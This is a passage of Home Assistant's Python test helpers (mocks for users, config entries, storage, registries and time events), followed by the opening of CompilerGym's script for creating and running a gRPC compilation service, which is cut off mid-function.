"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)
).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return asyncio.run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop
).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), "testing_config", *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
hass = loop.run_until_complete(async_test_home_assistant(loop))
loop_stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
loop_stop_event.set()
orig_stop = hass.stop
hass._stopped = Mock(set=loop.stop)
def start_hass(*mocks):
"""Start hass."""
asyncio.run_coroutine_threadsafe(hass.async_start(), loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
loop_stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
async def async_test_home_assistant(loop, load_registries=True):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant()
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {}, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
orig_async_add_executor_job = hass.async_add_executor_job
orig_async_create_task = hass.async_create_task
def async_add_job(target, *args):
"""Add job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock) and not isinstance(target, AsyncMock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_job(target, *args)
def async_add_executor_job(target, *args):
"""Add executor job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_executor_job(target, *args)
def async_create_task(coroutine):
"""Create task."""
if isinstance(coroutine, Mock) and not isinstance(coroutine, AsyncMock):
fut = asyncio.Future()
fut.set_result(None)
return fut
return orig_async_create_task(coroutine)
async def async_wait_for_task_count(self, max_remaining_tasks: int = 0) -> None:
"""Block until at most max_remaining_tasks remain.
Based on HomeAssistant.async_block_till_done
"""
# To flush out any call_soon_threadsafe
await asyncio.sleep(0)
start_time: float | None = None
while len(self._pending_tasks) > max_remaining_tasks:
pending: Collection[Awaitable[Any]] = [
task for task in self._pending_tasks if not task.done()
]
self._pending_tasks.clear()
if len(pending) > max_remaining_tasks:
remaining_pending = await self._await_count_and_log_pending(
pending, max_remaining_tasks=max_remaining_tasks
)
self._pending_tasks.extend(remaining_pending)
if start_time is None:
# Avoid calling monotonic() until we know
# we may need to start logging blocked tasks.
start_time = 0
elif start_time == 0:
# If we have waited twice then we set the start
# time
start_time = monotonic()
elif monotonic() - start_time > BLOCK_LOG_TIMEOUT:
# We have waited at least three loops and new tasks
# continue to block. At this point we start
# logging all waiting tasks.
for task in pending:
_LOGGER.debug("Waiting for task: %s", task)
else:
self._pending_tasks.extend(pending)
await asyncio.sleep(0)
async def _await_count_and_log_pending(
self, pending: Collection[Awaitable[Any]], max_remaining_tasks: int = 0
) -> Collection[Awaitable[Any]]:
"""Block at most max_remaining_tasks remain and log tasks that take a long time.
Based on HomeAssistant._await_and_log_pending
"""
wait_time = 0
return_when = asyncio.ALL_COMPLETED
if max_remaining_tasks:
return_when = asyncio.FIRST_COMPLETED
while len(pending) > max_remaining_tasks:
_, pending = await asyncio.wait(
pending, timeout=BLOCK_LOG_TIMEOUT, return_when=return_when
)
if not pending or max_remaining_tasks:
return pending
wait_time += BLOCK_LOG_TIMEOUT
for task in pending:
_LOGGER.debug("Waited %s seconds for task: %s", wait_time, task)
return []
hass.async_add_job = async_add_job
hass.async_add_executor_job = async_add_executor_job
hass.async_create_task = async_create_task
hass.async_wait_for_task_count = types.MethodType(async_wait_for_task_count, hass)
hass._await_count_and_log_pending = types.MethodType(
_await_count_and_log_pending, hass
)
hass.data[loader.DATA_CUSTOM_COMPONENTS] = {}
hass.config.location_name = "test home"
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = "US/Pacific"
hass.config.units = METRIC_SYSTEM
hass.config.media_dirs = {"local": get_test_config_dir("media")}
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(
hass,
{
"_": "Not empty or else some bad checks for hass config in discovery.py breaks"
},
)
hass.config_entries._entries = {}
hass.config_entries._store._async_ensure_stop_listener = lambda: None
# Load the registries
if load_registries:
await asyncio.gather(
device_registry.async_load(hass),
entity_registry.async_load(hass),
area_registry.async_load(hass),
)
await hass.async_block_till_done()
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
async def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch("homeassistant.core._async_create_timer"), patch.object(
hass, "async_stop_track_tasks"
):
await orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
async def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode("utf-8")
msg = ReceiveMessage(topic, payload, qos, retain)
hass.data["mqtt"]._mqtt_handle_message(msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(
hass: HomeAssistant, datetime_: datetime | None = None, fire_all: bool = False
) -> None:
"""Fire a time changed event."""
if datetime_ is None:
datetime_ = date_util.utcnow()
hass.bus.async_fire(EVENT_TIME_CHANGED, {"now": date_util.as_utc(datetime_)})
for task in list(hass.loop._scheduled):
if not isinstance(task, asyncio.TimerHandle):
continue
if task.cancelled():
continue
mock_seconds_into_future = datetime_.timestamp() - time.time()
future_seconds = task.when() - hass.loop.time()
if fire_all or mock_seconds_into_future >= future_seconds:
with patch(
"homeassistant.helpers.event.time_tracker_utcnow",
return_value=date_util.as_utc(datetime_),
):
task._run()
task.cancel()
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def get_fixture_path(filename: str, integration: str | None = None) -> pathlib.Path:
"""Get path of fixture."""
if integration is None and "/" in filename and not filename.startswith("helpers/"):
integration, filename = filename.split("/", 1)
if integration is None:
return pathlib.Path(__file__).parent.joinpath("fixtures", filename)
else:
return pathlib.Path(__file__).parent.joinpath(
"components", integration, "fixtures", filename
)
def load_fixture(filename, integration=None):
"""Load a fixture."""
return get_fixture_path(filename, integration).read_text()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {"entity_id": new_state.entity_id, "new_state": new_state}
if old_state:
event_data["old_state"] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError(f"Integration {component} is already setup")
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
if mock_entries is None:
mock_entries = {}
registry.entities = entity_registry.EntityRegistryItems()
for key, entry in mock_entries.items():
registry.entities[key] = entry
hass.data[entity_registry.DATA_REGISTRY] = registry
return registry
def mock_area_registry(hass, mock_entries=None):
"""Mock the Area Registry."""
registry = area_registry.AreaRegistry(hass)
registry.areas = mock_entries or OrderedDict()
hass.data[area_registry.DATA_REGISTRY] = registry
return registry
def mock_device_registry(hass, mock_entries=None, mock_deleted_entries=None):
"""Mock the Device Registry."""
registry = device_registry.DeviceRegistry(hass)
registry.devices = mock_entries or OrderedDict()
registry.deleted_devices = mock_deleted_entries or OrderedDict()
registry._rebuild_index()
hass.data[device_registry.DATA_REGISTRY] = registry
return registry
class MockGroup(auth_models.Group):
"""Mock a group in Home Assistant."""
def __init__(self, id=None, name="Mock Group", policy=system_policies.ADMIN_POLICY):
"""Mock a group."""
kwargs = {"name": name, "policy": policy}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._groups[self.id] = self
return self
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(
self,
id=None,
is_owner=False,
is_active=True,
name="Mock User",
system_generated=False,
groups=None,
):
"""Initialize mock user."""
kwargs = {
"is_owner": is_owner,
"is_active": is_active,
"name": name,
"system_generated": system_generated,
"groups": groups or [],
"perm_lookup": None,
}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
def mock_policy(self, policy):
"""Mock a policy for a user."""
self._permissions = auth_permissions.PolicyPermissions(policy, self.perm_lookup)
async def register_auth_provider(hass, config):
"""Register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config
)
assert provider is not None, "Invalid config specified"
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError("Provider already registered")
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._set_defaults()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(
self,
domain=None,
dependencies=None,
setup=None,
requirements=None,
config_schema=None,
platform_schema=None,
platform_schema_base=None,
async_setup=None,
async_setup_entry=None,
async_unload_entry=None,
async_migrate_entry=None,
async_remove_entry=None,
partial_manifest=None,
async_remove_config_entry_device=None,
):
"""Initialize the mock module."""
self.__name__ = f"homeassistant.components.{domain}"
self.__file__ = f"homeassistant/components/{domain}"
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
# Overlay to be used when generating manifest from this module
self._partial_manifest = partial_manifest
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if platform_schema_base is not None:
self.PLATFORM_SCHEMA_BASE = platform_schema_base
if setup:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = AsyncMock(return_value=True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
if async_migrate_entry is not None:
self.async_migrate_entry = async_migrate_entry
if async_remove_entry is not None:
self.async_remove_entry = async_remove_entry
if async_remove_config_entry_device is not None:
self.async_remove_config_entry_device = async_remove_config_entry_device
def mock_manifest(self):
"""Generate a mock manifest to represent this module."""
return {
**loader.manifest_from_legacy_module(self.DOMAIN, self),
**(self._partial_manifest or {}),
}
class MockPlatform:
"""Provide a fake platform."""
__name__ = "homeassistant.components.light.bla"
__file__ = "homeassistant/components/blah/light"
# pylint: disable=invalid-name
def __init__(
self,
setup_platform=None,
dependencies=None,
platform_schema=None,
async_setup_platform=None,
async_setup_entry=None,
scan_interval=None,
):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = AsyncMock(return_value=None)
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self,
hass,
logger=None,
domain="test_domain",
platform_name="test_platform",
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger("homeassistant.helpers.entity_platform")
# Otherwise the constructor will blow up.
if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
)
class MockToggleEntity(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state, unique_id=None):
"""Initialize the mock entity."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the entity if any."""
self.calls.append(("name", {}))
return self._name
@property
def state(self):
"""Return the state of the entity if any."""
self.calls.append(("state", {}))
return self._state
@property
def is_on(self):
"""Return true if entity is on."""
self.calls.append(("is_on", {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the entity on."""
self.calls.append(("turn_on", kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the entity off."""
self.calls.append(("turn_off", kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
return next(call for call in reversed(self.calls) if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(
self,
*,
domain="test",
data=None,
version=1,
entry_id=None,
source=config_entries.SOURCE_USER,
title="Mock Title",
state=None,
options={},
pref_disable_new_entities=None,
pref_disable_polling=None,
unique_id=None,
disabled_by=None,
reason=None,
):
"""Initialize a mock config entry."""
kwargs = {
"entry_id": entry_id or uuid_util.random_uuid_hex(),
"domain": domain,
"data": data or {},
"pref_disable_new_entities": pref_disable_new_entities,
"pref_disable_polling": pref_disable_polling,
"options": options,
"version": version,
"title": title,
"unique_id": unique_id,
"disabled_by": disabled_by,
}
if source is not None:
kwargs["source"] = source
if state is not None:
kwargs["state"] = state
super().__init__(**kwargs)
if reason is not None:
self.reason = reason
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries[self.entry_id] = self
hass.config_entries._domain_index.setdefault(self.domain, []).append(
self.entry_id
)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries[self.entry_id] = self
manager._domain_index.setdefault(self.domain, []).append(self.entry_id)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(files_dict.keys(), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if isinstance(fname, pathlib.Path):
fname = str(fname)
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, "name", fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, "name", fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if "homeassistant/components" in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding="utf-8")
# Not found
raise FileNotFoundError(f"File not found: {fname}")
return patch.object(yaml_loader, "open", mock_open_f, create=True)
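# Example usage (hedged sketch; the file name and YAML content are illustrative):
#
#     files = {"configuration.yaml": "homeassistant:\n  name: Test Home"}
#     with patch_yaml_files(files):
#         ...  # code under test that loads configuration.yaml via load_yaml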
def mock_coro(return_value=None, exception=None):
"""Return a coro that returns a value or raise an exception."""
fut = asyncio.Future()
if exception is not None:
fut.set_exception(exception)
else:
fut.set_result(return_value)
return fut
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
- count: The number of valid platforms that should be set up
- domain: The domain to count. Optional; it can usually be
determined automatically
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
async def mock_psc(hass, config_input, integration):
"""Mock the prepare_setup_component to capture config."""
domain_input = integration.domain
res = await async_process_component_config(hass, config_input, integration)
config[domain_input] = None if res is None else res.get(domain_input)
_LOGGER.debug(
"Configuration for %s, Validated: %s, Original %s",
domain_input,
config[domain_input],
config_input.get(domain_input),
)
return res
assert isinstance(config, dict)
with patch("homeassistant.config.async_process_component_config", mock_psc):
yield config
if domain is None:
assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format(
list(config.keys())
)
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert (
res_len == count
), f"setup_component failed, expected {count} got {res_len}: {res}"
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = "sqlite://" # In memory DB
with patch("homeassistant.components.recorder.migration.migrate_schema"):
assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
async def async_init_recorder_component(hass, add_config=None):
"""Initialize the recorder asynchronously."""
config = add_config or {}
if recorder.CONF_DB_URL not in config:
config[recorder.CONF_DB_URL] = "sqlite://"
with patch("homeassistant.components.recorder.migration.migrate_schema"):
assert await async_setup_component(
hass, recorder.DOMAIN, {recorder.DOMAIN: config}
)
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_STATE_TASK
data = restore_state.RestoreStateData(hass)
now = date_util.utcnow()
last_states = {}
for state in states:
restored_state = state.as_dict()
restored_state = {
**restored_state,
"attributes": json.loads(
json.dumps(restored_state["attributes"], cls=JSONEncoder)
),
}
last_states[state.entity_id] = restore_state.StoredState.from_dict(
{"state": restored_state, "last_seen": now}
)
data.last_states = last_states
_LOGGER.debug("Restore cache: %s", data.last_states)
assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}"
hass.data[key] = data
def mock_restore_cache_with_extra_data(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_STATE_TASK
data = restore_state.RestoreStateData(hass)
now = date_util.utcnow()
last_states = {}
for state, extra_data in states:
restored_state = state.as_dict()
restored_state = {
**restored_state,
"attributes": json.loads(
json.dumps(restored_state["attributes"], cls=JSONEncoder)
),
}
last_states[state.entity_id] = restore_state.StoredState.from_dict(
{"state": restored_state, "extra_data": extra_data, "last_seen": now}
)
data.last_states = last_states
_LOGGER.debug("Restore cache: %s", data.last_states)
assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}"
hass.data[key] = data
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if "entity_id" in values:
self.entity_id = values["entity_id"]
@property
def available(self):
"""Return True if entity is available."""
return self._handle("available")
@property
def capability_attributes(self):
"""Info about capabilities."""
return self._handle("capability_attributes")
@property
def device_class(self):
"""Info how device should be classified."""
return self._handle("device_class")
@property
def device_info(self):
"""Info how it links to a device."""
return self._handle("device_info")
@property
def entity_category(self):
"""Return the entity category."""
return self._handle("entity_category")
@property
def entity_registry_enabled_default(self):
"""Return if the entity should be enabled when first added to the entity registry."""
return self._handle("entity_registry_enabled_default")
@property
def icon(self):
"""Return the suggested icon."""
return self._handle("icon")
@property
def name(self):
"""Return the name of the entity."""
return self._handle("name")
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle("should_poll")
@property
def state(self):
"""Return the state of the entity."""
return self._handle("state")
@property
def supported_features(self):
"""Info about supported features."""
return self._handle("supported_features")
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle("unique_id")
@property
def unit_of_measurement(self):
"""Info on the units the entity state is in."""
return self._handle("unit_of_measurement")
def _handle(self, attr):
"""Return attribute value."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if "data" not in mock_data or "version" not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info("Loading data for %s: %s", store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
# To ensure that the data can be serialized
_LOGGER.info("Writing data to %s: %s", store.key, data_to_write)
raise_contains_mocks(data_to_write)
data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder))
async def mock_remove(store):
"""Remove data."""
data.pop(store.key, None)
with patch(
"homeassistant.helpers.storage.Store._async_load",
side_effect=mock_async_load,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store._write_data",
side_effect=mock_write_data,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store.async_remove",
side_effect=mock_remove,
autospec=True,
):
yield data
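# Example usage (hedged sketch; the storage key and contents are illustrative):
#
#     with mock_storage({"core.config": {"version": 1, "data": {"foo": "bar"}}}) as stored:
#         ...  # exercise code that reads or writes hass storage
#         # anything the code wrote back is now visible in `stored`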
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
store._async_cleanup_final_write_listener()
store._async_cleanup_delay_listener()
await store._async_handle_write_data()
async def get_system_health_info(hass, domain):
"""Get system health info."""
return await hass.data["system_health"][domain].info_callback(hass)
def mock_integration(hass, module, built_in=True):
"""Mock an integration."""
integration = loader.Integration(
hass,
f"{loader.PACKAGE_BUILTIN}.{module.DOMAIN}"
if built_in
else f"{loader.PACKAGE_CUSTOM_COMPONENTS}.{module.DOMAIN}",
None,
module.mock_manifest(),
)
def mock_import_platform(platform_name):
raise ImportError(
f"Mocked unable to import platform '{platform_name}'",
name=f"{integration.pkg_path}.{platform_name}",
)
integration._import_platform = mock_import_platform
_LOGGER.info("Adding mock integration: %s", module.DOMAIN)
hass.data.setdefault(loader.DATA_INTEGRATIONS, {})[module.DOMAIN] = integration
hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module
return integration
def mock_entity_platform(hass, platform_path, module):
"""Mock a entity platform.
platform_path is in form light.hue. Will create platform
hue.light.
"""
domain, platform_name = platform_path.split(".")
mock_platform(hass, f"{platform_name}.{domain}", module)
def mock_platform(hass, platform_path, module=None):
"""Mock a platform.
platform_path is in form hue.config_flow.
"""
domain, platform_name = platform_path.split(".")
integration_cache = hass.data.setdefault(loader.DATA_INTEGRATIONS, {})
module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {})
if domain not in integration_cache:
mock_integration(hass, MockModule(domain))
_LOGGER.info("Adding mock integration platform: %s", platform_path)
module_cache[platform_path] = module or Mock()
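# Example usage (hedged sketch; the "hue" domain is illustrative):
#
#     mock_integration(hass, MockModule("hue"))
#     mock_platform(hass, "hue.config_flow", Mock())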
def async_capture_events(hass, event_name):
"""Create a helper that captures events."""
events = []
@ha.callback
def capture_events(event):
events.append(event)
hass.bus.async_listen(event_name, capture_events)
return events
@ha.callback
def async_mock_signal(hass, signal):
"""Catch all dispatches to a signal."""
calls = []
@ha.callback
def mock_signal_handler(*args):
"""Mock service call."""
calls.append(args)
hass.helpers.dispatcher.async_dispatcher_connect(signal, mock_signal_handler)
return calls
class hashdict(dict):
"""
hashable dict implementation, suitable for use as a key into other dicts.
>>> h1 = hashdict({"apples": 1, "bananas":2})
>>> h2 = hashdict({"bananas": 3, "mangoes": 5})
>>> h1+h2
hashdict(apples=1, bananas=3, mangoes=5)
>>> d1 = {}
>>> d1[h1] = "salad"
>>> d1[h1]
'salad'
>>> d1[h2]
Traceback (most recent call last):
...
KeyError: hashdict(bananas=3, mangoes=5)
based on answers from
http://stackoverflow.com/questions/1151658/python-hashable-dicts
"""
def __key(self):
return tuple(sorted(self.items()))
def __repr__(self): # noqa: D105 no docstring
return ", ".join(f"{i[0]!s}={i[1]!r}" for i in self.__key())
def __hash__(self): # noqa: D105 no docstring
return hash(self.__key())
def __setitem__(self, key, value): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def __delitem__(self, key): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def clear(self): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def pop(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def popitem(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def setdefault(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def update(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
# update is not ok because it mutates the object
# __add__ is ok because it creates a new object
# while the new object is under construction, it's ok to mutate it
def __add__(self, right): # noqa: D105 no docstring
result = hashdict(self)
dict.update(result, right)
return result
def assert_lists_same(a, b):
"""Compare two lists, ignoring order."""
assert collections.Counter([hashdict(i) for i in a]) == collections.Counter(
[hashdict(i) for i in b]
)
def raise_contains_mocks(val):
"""Raise for mocks."""
if isinstance(val, Mock):
raise ValueError
if isinstance(val, dict):
for dict_value in val.values():
raise_contains_mocks(dict_value)
if isinstance(val, list):
for dict_value in val:
raise_contains_mocks(dict_value)
|
create_and_run_compiler_gym_service.py
|
#! /usr/bin/env python3
#
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""An example CompilerGym service in python."""
import os
import sys
from concurrent import futures
from multiprocessing import cpu_count
from pathlib import Path
from signal import SIGTERM, signal
from tempfile import mkdtemp
from threading import Event, Thread
from typing import Type
import grpc
from absl import app, flags, logging
from compiler_gym.service import connection
from compiler_gym.service.compilation_session import CompilationSession
from compiler_gym.service.proto import compiler_gym_service_pb2_grpc
from compiler_gym.service.runtime.compiler_gym_service import CompilerGymService
from compiler_gym.util import debug_util as dbg
from compiler_gym.util.filesystem import atomic_file_write
from compiler_gym.util.shell_format import plural
flags.DEFINE_string("working_dir", "", "Path to use as service working directory")
flags.DEFINE_integer("port", 0, "The service listening port")
flags.DEFINE_integer(
"rpc_service_threads", cpu_count(), "The number of server worker threads"
)
flags.DEFINE_integer("logbuflevel", 0, "Flag for compatability with C++ service.")
FLAGS = flags.FLAGS
MAX_MESSAGE_SIZE_IN_BYTES = 512 * 1024 * 1024
shutdown_signal = Event()
# NOTE(cummins): This script is executed in a subprocess, so code coverage
# tracking does not work. As such we use "# pragma: no cover" annotation for all
# functions.
def _shutdown_handler(signal_number, stack_frame): # pragma: no cover
del stack_frame # Unused
logging.info("Service received signal: %d", signal_number)
shutdown_signal.set()
def create_and_run_compiler_gym_service(
compilation_session_type: Type[CompilationSession],
): # pragma: no cover
"""Create and run an RPC service for the given compilation session.
This should be called on its own in a self-contained script to implement a
compilation service. Example:
.. code-block:: python
from compiler_gym.service import runtime
from my_compiler_service import MyCompilationSession
if __name__ == "__main__":
runtime.create_and_run_compiler_gym_service(MyCompilationSession)
This function never returns.
:param compilation_session_type: A subclass of :class:`CompilationSession
<compiler_gym.service.CompilationSession>` that provides implementations
of the abstract methods.
"""
def main(argv):
# Register a signal handler for SIGTERM that will set the shutdownSignal
# future value.
signal(SIGTERM, _shutdown_handler)
argv = [x for x in argv if x.strip()]
if len(argv) > 1:
print(
f"ERROR: Unrecognized command line argument '{argv[1]}'",
file=sys.stderr,
)
sys.exit(1)
working_dir = Path(FLAGS.working_dir or mkdtemp(prefix="compiler_gym-service-"))
(working_dir / "logs").mkdir(exist_ok=True, parents=True)
FLAGS.log_dir = str(working_dir / "logs")
logging.get_absl_handler().use_absl_log_file()
logging.set_verbosity(dbg.get_logging_level())
# Create the service.
server = grpc.server(
futures.ThreadPoolExecutor(max_workers=FLAGS.rpc_service_threads),
options=connection.GRPC_CHANNEL_OPTIONS,
)
service = CompilerGymService(
working_directory=working_dir,
compilation_session_type=compilation_session_type,
)
compiler_gym_service_pb2_grpc.add_CompilerGymServiceServicer_to_server(
service, server
)
address = f"0.0.0.0:{FLAGS.port}" if FLAGS.port else "0.0.0.0:0"
port = server.add_insecure_port(address)
with atomic_file_write(working_dir / "port.txt", fileobj=True, mode="w") as f:
f.write(str(port))
with atomic_file_write(working_dir / "pid.txt", fileobj=True, mode="w") as f:
f.write(str(os.getpid()))
logging.info(
